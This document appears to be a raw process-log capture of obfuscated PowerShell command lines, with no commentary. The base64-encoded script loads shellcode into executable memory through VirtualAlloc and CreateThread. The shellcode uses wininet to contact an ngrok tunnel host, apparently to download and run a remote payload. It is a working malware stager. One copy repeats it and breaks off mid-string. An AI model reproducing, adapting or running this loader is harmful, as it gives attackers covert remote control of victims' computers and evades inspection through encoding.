"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv TG -;sv rk ec;sv Sj ((gv TG).value.toString()+(gv rk).value.toString());powershell (gv Sj).value.toString() 'JAB1AGoAIAA9ACAAJwAkAFQATwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABIAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdQBqACkAKQA7ACQASgBHACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFIASgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABSAEoAIAAkAEoARwAgACQASABEACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEoARwAgACQASABEACIAOwB9AA=='"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB1AGoAIAA9ACAAJwAkAFQATwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABIAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdQBqACkAKQA7ACQASgBHACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFIASgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABSAEoAIAAkAEoARwAgACQASABEACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAg